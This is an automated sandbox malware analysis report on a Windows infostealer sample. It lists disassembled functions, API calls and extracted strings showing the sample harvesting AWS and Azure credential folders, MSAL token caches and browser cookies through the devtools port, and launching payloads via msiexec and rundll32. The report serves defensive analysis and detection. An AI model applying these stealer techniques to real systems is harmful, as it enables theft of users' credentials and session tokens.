                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 8c03534cf8033439d1b8fc2794721ab34511b2ed4f5cb47d551d3bf5b308a732
                                  • Instruction ID: 950650bbdced78415948ea379b46a847b20e05f78f62a224c1f8e48ee96fbb28
                                  • Opcode Fuzzy Hash: 8c03534cf8033439d1b8fc2794721ab34511b2ed4f5cb47d551d3bf5b308a732
                                  • Instruction Fuzzy Hash: 87E1C8B1914108ABCB54EBE4DCA6FFEB77AEF54304F00419DF10667191EB30AA49CB69
                                  Function 006C84B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • RegOpenKeyExA.ADVAPI32(00000000,0147B488,00000000,00020019,00000000,006D05BE), ref: 006C8534
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006C85B6
                                  • wsprintfA.USER32 ref: 006C85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006C860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C8629
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: fccab8a225974172457b1228dcad96e7f05cfac4dd80a39ec164f1a48cc96e73
                                  • Instruction ID: 647f06bf266fa8de3726746c8c903d7760fbd31eacc4cbc59af378387810f0a2
                                  • Opcode Fuzzy Hash: fccab8a225974172457b1228dcad96e7f05cfac4dd80a39ec164f1a48cc96e73
                                  • Instruction Fuzzy Hash: 2A81F87191411CABDB64DB94CD95FEAB7B9FB48704F1082DDE209A6180DF70AE84CFA4
                                  Function 006C91A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006C91FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: `dlF$`dlF$image/jpeg
                                  • API String ID: 2244384528-3363227958
                                  • Opcode ID: 925ef2d15fce99149c5af1b5dab2490b0d546dbcc02e64189022fc632647d482
                                  • Instruction ID: 1e075fbb6a20448f091a56de75f20c799a151b980dabdf5c9f866ec0c4bbffd6
                                  • Opcode Fuzzy Hash: 925ef2d15fce99149c5af1b5dab2490b0d546dbcc02e64189022fc632647d482
                                  • Instruction Fuzzy Hash: 4971BAB1A14208ABDB14DFE4DC99FEEB779EB48700F10850CF616AB290DB74E944DB64
                                  Function 006C4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006C8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C5000
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 006C501D
                                    • Part of subcall function 006C4B60: wsprintfA.USER32 ref: 006C4B7C
                                    • Part of subcall function 006C4B60: FindFirstFileA.KERNEL32(?,?), ref: 006C4B93
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C508C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 006C50A9
                                    • Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D0FC4), ref: 006C4BC1
                                    • Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D0FC8), ref: 006C4BD7
                                    • Part of subcall function 006C4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 006C4DCD
                                    • Part of subcall function 006C4B60: FindClose.KERNEL32(000000FF), ref: 006C4DE2
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C5118
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006C5135
                                    • Part of subcall function 006C4B60: wsprintfA.USER32 ref: 006C4C00
                                    • Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D08D3), ref: 006C4C15
                                    • Part of subcall function 006C4B60: wsprintfA.USER32 ref: 006C4C32
                                    • Part of subcall function 006C4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 006C4C6E
                                    • Part of subcall function 006C4B60: lstrcat.KERNEL32(?,0147E988), ref: 006C4C9A
                                    • Part of subcall function 006C4B60: lstrcat.KERNEL32(?,006D0FE0), ref: 006C4CAC
                                    • Part of subcall function 006C4B60: lstrcat.KERNEL32(?,?), ref: 006C4CC0
                                    • Part of subcall function 006C4B60: lstrcat.KERNEL32(?,006D0FE4), ref: 006C4CD2
                                    • Part of subcall function 006C4B60: lstrcat.KERNEL32(?,?), ref: 006C4CE6
                                    • Part of subcall function 006C4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 006C4CFC
                                    • Part of subcall function 006C4B60: DeleteFileA.KERNEL32(?), ref: 006C4D81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 42541623e2e5769b53d5c3a5235380d7fcfbf5e77602e953f21a1c9e9aeff641
                                  • Instruction ID: 096b3b98b46d3c1f5a13652de604926697350e565ece782b40257fe0fbd89d5c
                                  • Opcode Fuzzy Hash: 42541623e2e5769b53d5c3a5235380d7fcfbf5e77602e953f21a1c9e9aeff641
                                  • Instruction Fuzzy Hash: AA41E7BA94420877DB60F7A0EC97FED732A9B51704F00445C7245661C1EEF4ABC88B92
                                  Function 006C3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 006C3415
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 006C35AD
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 006C373A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 42bdbe323909aa6e8d38355485a44786e172fad061703d882d07c9abd401230b
                                  • Instruction ID: 9bdf3e1cf5b25d97c146cfa250068f0be1fef8b087b8e0bd9cdb1f4e1410c2fa
                                  • Opcode Fuzzy Hash: 42bdbe323909aa6e8d38355485a44786e172fad061703d882d07c9abd401230b
                                  • Instruction Fuzzy Hash: 4E12F97191011C9ACB58EBE0DDA2FFDB73AEF14304F00459DE50666192EF346B49CB6A
                                  Function 006B9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,cookies), ref: 006B9CAF
                                  • lstrcat.KERNEL32(?,006D12C4), ref: 006B9CC1
                                  • lstrcat.KERNEL32(?,?), ref: 006B9CD5
                                  • lstrcat.KERNEL32(?,006D12C8), ref: 006B9CE7
                                  • lstrcat.KERNEL32(?,?), ref: 006B9CFB
                                  • lstrcat.KERNEL32(?,.txt), ref: 006B9D0D
                                  • lstrlen.KERNEL32(00000000), ref: 006B9D17
                                  • lstrlen.KERNEL32(00000000), ref: 006B9D26
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1797936820-3542011879
                                  • Opcode ID: f52233e016da00e34ce0a645575b86e9fbe7c13628136e5e85ad820fd30dea67
                                  • Instruction ID: 772db98abe5f59173fe077d1dd741bb07ba62195c035f247b19402d80157adcc
                                  • Opcode Fuzzy Hash: f52233e016da00e34ce0a645575b86e9fbe7c13628136e5e85ad820fd30dea67
                                  • Instruction Fuzzy Hash: 88516CB2D10508ABDB14EBE0DC95FEEB339AF04301F404558F20AA7191EF75AA89CF65
                                  Function 006C5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B62D0: InternetOpenA.WININET(006D0DFF,00000001,00000000,00000000,00000000), ref: 006B6331
                                    • Part of subcall function 006B62D0: StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B6353
                                    • Part of subcall function 006B62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006B6385
                                    • Part of subcall function 006B62D0: HttpOpenRequestA.WININET(00000000,GET,?,0147E158,00000000,00000000,00400100,00000000), ref: 006B63D5
                                    • Part of subcall function 006B62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006B640F
                                    • Part of subcall function 006B62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006B6421
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006C5568
                                  • lstrlen.KERNEL32(00000000), ref: 006C557F
                                    • Part of subcall function 006C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006C8FE2
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 006C55B4
                                  • lstrlen.KERNEL32(00000000), ref: 006C55D3
                                  • lstrlen.KERNEL32(00000000), ref: 006C55FE
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 554545886415db53d51efb191871aa24efe3d877579e23ad848104f3e4c9f74a
                                  • Instruction ID: 381ca6a1f309e5b5062863aea150079d48ffd8ec53276aaa44f2f82dc5fecfe7
                                  • Opcode Fuzzy Hash: 554545886415db53d51efb191871aa24efe3d877579e23ad848104f3e4c9f74a
                                  • Instruction Fuzzy Hash: C751C67091010CABCB54FFA0CDA6FFD773AEF11344F90445CE50A5A592EB30AA45DB6A
                                  Function 006C1520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 5814823e8682d754b2a34925609c48aafe3992dee021a152bbef09d0f4c84fac
                                  • Instruction ID: b71a81fa34e4580fcc61f39aa69f06dec180ce9a6756c1a6130042be3164888d
                                  • Opcode Fuzzy Hash: 5814823e8682d754b2a34925609c48aafe3992dee021a152bbef09d0f4c84fac
                                  • Instruction Fuzzy Hash: 21C191B59001099BCB54EFA0DC99FEE737AEF54304F00459DE509AB242EB70EA85CFA5
                                  Function 006C44D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006C8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C453C
                                  • lstrcat.KERNEL32(?,0147E518), ref: 006C455B
                                  • lstrcat.KERNEL32(?,?), ref: 006C456F
                                  • lstrcat.KERNEL32(?,0147D218), ref: 006C4583
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006C8F20: GetFileAttributesA.KERNEL32(00000000,?,006B1B94,?,?,006D577C,?,?,006D0E22), ref: 006C8F2F
                                    • Part of subcall function 006BA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006BA489
                                    • Part of subcall function 006BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                    • Part of subcall function 006BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                    • Part of subcall function 006BA110: LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                    • Part of subcall function 006BA110: ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                    • Part of subcall function 006BA110: LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                    • Part of subcall function 006BA110: CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                    • Part of subcall function 006C9550: GlobalAlloc.KERNEL32(00000000,006C462D,006C462D), ref: 006C9563
                                  • StrStrA.SHLWAPI(?,0147E5C0), ref: 006C4643
                                  • GlobalFree.KERNEL32(?), ref: 006C4762
                                    • Part of subcall function 006BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA23F
                                    • Part of subcall function 006BA210: LocalAlloc.KERNEL32(00000040,?,?,?,006B4F3E,00000000,?), ref: 006BA251
                                    • Part of subcall function 006BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA27A
                                    • Part of subcall function 006BA210: LocalFree.KERNEL32(?,?,?,?,006B4F3E,00000000,?), ref: 006BA28F
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C46F3
                                  • StrCmpCA.SHLWAPI(?,006D08D2), ref: 006C4710
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 006C4722
                                  • lstrcat.KERNEL32(00000000,?), ref: 006C4735
                                  • lstrcat.KERNEL32(00000000,006D0FA0), ref: 006C4744
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
